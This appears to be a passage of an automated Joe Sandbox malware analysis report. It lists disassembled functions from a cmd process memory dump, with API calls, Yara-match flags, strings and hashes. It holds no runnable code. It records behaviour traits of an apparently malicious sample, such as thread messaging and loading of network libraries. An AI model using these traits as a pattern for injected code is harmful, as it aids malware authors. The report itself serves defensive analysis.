                                                                        • Instruction Fuzzy Hash: 59900435311404430105F75C47045070047C7DD351355D031F5117550CD731CD715531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 72a69f4179d1f5e2b4904d7d8555ffef391e941346e4b40c5af9bc023ed462b1
                                                                        • Instruction ID: 9aae4f90b66b1d0439a70a07146eaaf3d50e46b2756573d976e3e626b04ba578
                                                                        • Opcode Fuzzy Hash: 72a69f4179d1f5e2b4904d7d8555ffef391e941346e4b40c5af9bc023ed462b1
                                                                        • Instruction Fuzzy Hash: FA900225321404430145F658470450B044597DA351395D015F5517590CC72189655721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 74002d546f1a74f4f84c7f77053cc91d7dc3746a034bb9c328a4225ad0452e7b
                                                                        • Instruction ID: 138c7b80c63973a3d312be016b0041e735ab1aed7ba29f22a0c42691ec54b3e4
                                                                        • Opcode Fuzzy Hash: 74002d546f1a74f4f84c7f77053cc91d7dc3746a034bb9c328a4225ad0452e7b
                                                                        • Instruction Fuzzy Hash: 0C90026134140883D100B2588514B060005C7E5301F55D015F5165554D8719CD526526
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 31cc96386336f6b996698d2dfb1641f7f760b312f94bc8a87005ec415ce50671
                                                                        • Instruction ID: 3e932c8702bb2ef7f1f4712e491f2f3f668f2178d8323ca15cb139096646abde
                                                                        • Opcode Fuzzy Hash: 31cc96386336f6b996698d2dfb1641f7f760b312f94bc8a87005ec415ce50671
                                                                        • Instruction Fuzzy Hash: FD900221701404834140B268C9449064005ABE5211755D121B4A99550D875989655A65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 95658c0178d3afbc0db74d56f7235a653c7f5ffd8de098dc1e3b124a532d0e2b
                                                                        • Instruction ID: 85e79b2067a85b372341419b3418a5916e21580b188f84dc11c6d2f9ca668377
                                                                        • Opcode Fuzzy Hash: 95658c0178d3afbc0db74d56f7235a653c7f5ffd8de098dc1e3b124a532d0e2b
                                                                        • Instruction Fuzzy Hash: 4E900221311C0483D200B6688D14B07000587D4303F55D115B4255554CCB1589615921
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1a7c6be657303a853dd53ee52e1a852af7c01b1900f92486339386a5c7b9e1ea
                                                                        • Instruction ID: a16a9aaffde61058cfe999cfc2459b1de852243259818702b0c9e4cc910dd09d
                                                                        • Opcode Fuzzy Hash: 1a7c6be657303a853dd53ee52e1a852af7c01b1900f92486339386a5c7b9e1ea
                                                                        • Instruction Fuzzy Hash: 4B90026130180843D140B6588904607000587D4302F55D011B6165555E8B298D516535
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 55ff6f5e911f937b9b3e2b69347b34d3d9c8e6ec62b27655830e1e539f7d8135
                                                                        • Instruction ID: 1c34d9e4b0c002d6c2feb61485ae1960c3fd017e73163aeb4f9a33894fd19a05
                                                                        • Opcode Fuzzy Hash: 55ff6f5e911f937b9b3e2b69347b34d3d9c8e6ec62b27655830e1e539f7d8135
                                                                        • Instruction Fuzzy Hash: 6E90022931340443D180B258950860A000587D5202F95E415B4116558CCB1589695721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6cb7671cc8937b58f90f33bb380deee5c6c5000b5b33d16c989e044e8fc86348
                                                                        • Instruction ID: 707562966d43ea5fc17588d61ab043787c107e90e4819f727a50a83141362bea
                                                                        • Opcode Fuzzy Hash: 6cb7671cc8937b58f90f33bb380deee5c6c5000b5b33d16c989e044e8fc86348
                                                                        • Instruction Fuzzy Hash: 1B90022130140443D140B25895186064005D7E5301F55E011F4515554CDB1589565622
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 31a7756ebceb634208ca9cabbad66bda6639b4bcb61bcc9d7826222fb7d1a80a
                                                                        • Instruction ID: 01ba7ec41d4f7203090c5a0465dcdbd4a31e6e561707b296b01431390499de7a
                                                                        • Opcode Fuzzy Hash: 31a7756ebceb634208ca9cabbad66bda6639b4bcb61bcc9d7826222fb7d1a80a
                                                                        • Instruction Fuzzy Hash: 7D900221342445935545F2588504507400697E4241795D012B5515950C87269956DA21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4c6ea1175c9cff227b54da7813f09498a5638f226044675c62221e8926fd303e
                                                                        • Instruction ID: 0ae27c54dfd0d537dc4dad5c240cf07dfe5b9875c13104f3e7084c2a719ae119
                                                                        • Opcode Fuzzy Hash: 4c6ea1175c9cff227b54da7813f09498a5638f226044675c62221e8926fd303e
                                                                        • Instruction Fuzzy Hash: C990023130140853D111B2588604707000987D4241F95D412B4525558D97568A52A521
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7fb9e6050eda42f6dc13ee97c0d2b693c834636f8b39a222b22bb900851cf615
                                                                        • Instruction ID: 7daee188a8104999bc7a9112672e8b4c33101dda7119bfab3691811213822f46
                                                                        • Opcode Fuzzy Hash: 7fb9e6050eda42f6dc13ee97c0d2b693c834636f8b39a222b22bb900851cf615
                                                                        • Instruction Fuzzy Hash: D290023130148C43D110B258C50474A000587D4301F59D411B8525658D879589917521
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5fc2fdc773cc8f0bb27c5a7109d1b9f5f630e0085fae5fdcd0c5ec583e3ad3a7
                                                                        • Instruction ID: 8a0c24688bd6bdcb37fe90bbb067c54145cb56ab3382a4fab57aafc3d061ed59
                                                                        • Opcode Fuzzy Hash: 5fc2fdc773cc8f0bb27c5a7109d1b9f5f630e0085fae5fdcd0c5ec583e3ad3a7
                                                                        • Instruction Fuzzy Hash: F990023130140C83D100B2588504B46000587E4301F55D016B4225654D8715C9517921
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03142CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 16e76e186852cf7a83bb09e282f8af9312379cb60a2d76afe0b79cf4d1258af6
                                                                        • Instruction ID: b86901433d9e28b6ce70228fa7b0a1deb04aaefe3cb6c099b77d5d98996e0472
                                                                        • Opcode Fuzzy Hash: 16e76e186852cf7a83bb09e282f8af9312379cb60a2d76afe0b79cf4d1258af6
                                                                        • Instruction Fuzzy Hash: 4990023130140843D100B6989508646000587E4301F55E011B9125555EC76589916531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6fe86e67674642dd5fcffbb2052704c232740caeab3544a05995d5fce9b4432c
                                                                        • Instruction ID: d09237ce8c9b04f96cab15f2d49ee141efc9f31f5cbaf97d129cd958293f5348
                                                                        • Opcode Fuzzy Hash: 6fe86e67674642dd5fcffbb2052704c232740caeab3544a05995d5fce9b4432c
                                                                        • Instruction Fuzzy Hash: 3D90023170550843D100B2588614706100587D4201F65D411B4525568D87958A5169A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 031439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c47e786a890a524c543bbe87161c82a2ea21cc417cddc3a7282aae48ac9b92cf
                                                                        • Instruction ID: 206fee6b86b97dbde1b484679f74e47213d2f6e17d41ccca39f0a48cd7c1b0a6
                                                                        • Opcode Fuzzy Hash: c47e786a890a524c543bbe87161c82a2ea21cc417cddc3a7282aae48ac9b92cf
                                                                        • Instruction Fuzzy Hash: 9390022134545543D150B25C85046164005A7E4201F55D021B4915594D875589556621
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02840438 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 416 2840438-284043b 417 2840480-28404ea call 28599c0 call 285a3d0 call 2843e60 call 2831410 call 2850ce0 416->417 418 284043d-2840440 416->418 442 28404ec-28404fb PostThreadMessageW 417->442 443 284050a-2840510 417->443 420 2840442 418->420 421 28403de-28403eb 418->421 425 284046c-2840477 420->425 422 28403ed 421->422 423 284040e-2840412 421->423 426 2840376 422->426 427 28403ef-2840402 422->427 423->425 428 2840414-2840415 423->428 425->417 431 28403a5-28403a6 426->431 430 2840404-284040d 427->430 427->431 432 2840416-284042c 428->432 433 28403a8 428->433 430->423 431->427 431->433 432->416 433->421 442->443 444 28404fd-2840507 442->444 444->443
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: 43134e50cc7a06775172646e7f07a8ae796d332ce13ea25c3e19cdb95e2ff928
                                                                        • Instruction ID: 182d193d68cdb1d8508ea34d98b39b27b5fa75a87181ee566d250933e3bb7666
                                                                        • Opcode Fuzzy Hash: 43134e50cc7a06775172646e7f07a8ae796d332ce13ea25c3e19cdb95e2ff928
                                                                        • Instruction Fuzzy Hash: 8831AF7E90420CBBE7159A984C81DEFBF6CEF01278F54826DEE54E7141EB254A078BE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0284047A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: adf48eb09678d213e8e502bdff382f63c4b52240190bba6b7a811287ea47f8f7
                                                                        • Instruction ID: f70acc49ecf6aa9e563fb179709d27f379a849b509298cde464f48afdb9fff35
                                                                        • Opcode Fuzzy Hash: adf48eb09678d213e8e502bdff382f63c4b52240190bba6b7a811287ea47f8f7
                                                                        • Instruction Fuzzy Hash: 5C01E579D0015CBADB019AE58C81DEF7B7CDF01794F458064FA04E7100E6385E068BB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02840480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: aa15bfedecffb46972eadfcb0b5a986ba7d1d5a8dd7a82fd0bc76cdc92adc85d
                                                                        • Instruction ID: 391a451901e623fd54cb11c5060a5b8b3d9d9be9fde84dbfe91f23445044db67
                                                                        • Opcode Fuzzy Hash: aa15bfedecffb46972eadfcb0b5a986ba7d1d5a8dd7a82fd0bc76cdc92adc85d
                                                                        • Instruction Fuzzy Hash: E701C479D0011CBBDB11AAE58C81DEF7B7CEF41794F458064FA04E7100E6785E068BB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02840419 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58threadwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 474 2840419-284041c 475 284041e-284042c 474->475 476 2840499-284049f 474->476 475->476 477 28404a5-28404ea call 2843e60 call 2831410 call 2850ce0 476->477 478 28404a0 call 285a3d0 476->478 485 28404ec-28404fb PostThreadMessageW 477->485 486 284050a-2840510 477->486 478->477 485->486 487 28404fd-2840507 485->487 487->486
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(545Ni1I,00000111,00000000,00000000), ref: 028404F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 545Ni1I$545Ni1I
                                                                        • API String ID: 1836367815-63548436
                                                                        • Opcode ID: 21cc48393310c33b233fb5514333d948663fe40a5f1bdf6eca74525dfac79539
                                                                        • Instruction ID: a647f8e9385f9c1d3a95f24255841c09bfd2ecab08f2c695b7efe556675f4e03
                                                                        • Opcode Fuzzy Hash: 21cc48393310c33b233fb5514333d948663fe40a5f1bdf6eca74525dfac79539
                                                                        • Instruction Fuzzy Hash: 3601287AD0011CBB8B119AE45C80DEF6B6CDF41358F96C595EE08FB200EA394E064BE2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 028525C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 0285268B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: fd95a50efc9080267c9f739c816b20bfb6b4f6f58e296726e0beddb676278541
                                                                        • Instruction ID: e59f736c68f01e5cc371b887d7a76031ea5e54b9bfea67a54691b98a5f6dc747
                                                                        • Opcode Fuzzy Hash: fd95a50efc9080267c9f739c816b20bfb6b4f6f58e296726e0beddb676278541
                                                                        • Instruction Fuzzy Hash: AD3181B9601705BBC714DF64C884FE7BBA9BB48304F00852DEA5D9B245DB70BA44CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02843F00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02843ED2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID: r
                                                                        • API String ID: 2234796835-1812594589
                                                                        • Opcode ID: 1e4028a37386456fed0e9081d3f30b2fe1b7b3fc2cf7d8954cb7478db5a2e092
                                                                        • Instruction ID: eb8c94111a4811994be7f9093b7d768875dca5b2e533f4c6b85524b05c825209
                                                                        • Opcode Fuzzy Hash: 1e4028a37386456fed0e9081d3f30b2fe1b7b3fc2cf7d8954cb7478db5a2e092
                                                                        • Instruction Fuzzy Hash: EE118C39E0028EAFCB01CE54C845B5AB7A4DF85644F188ADCE849CF242E730DA06CBD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0284E627 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 0284E647
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID: @J7<
                                                                        • API String ID: 2538663250-2016760708
                                                                        • Opcode ID: 7f0e713acc172d27c6742d678114a191414d25f959b36308923f0231d7236bb1
                                                                        • Instruction ID: 3425fad1f3e1e5825f9348cebba4a15b83a1b787a420cd7008ebe849ef6bb83b
                                                                        • Opcode Fuzzy Hash: 7f0e713acc172d27c6742d678114a191414d25f959b36308923f0231d7236bb1
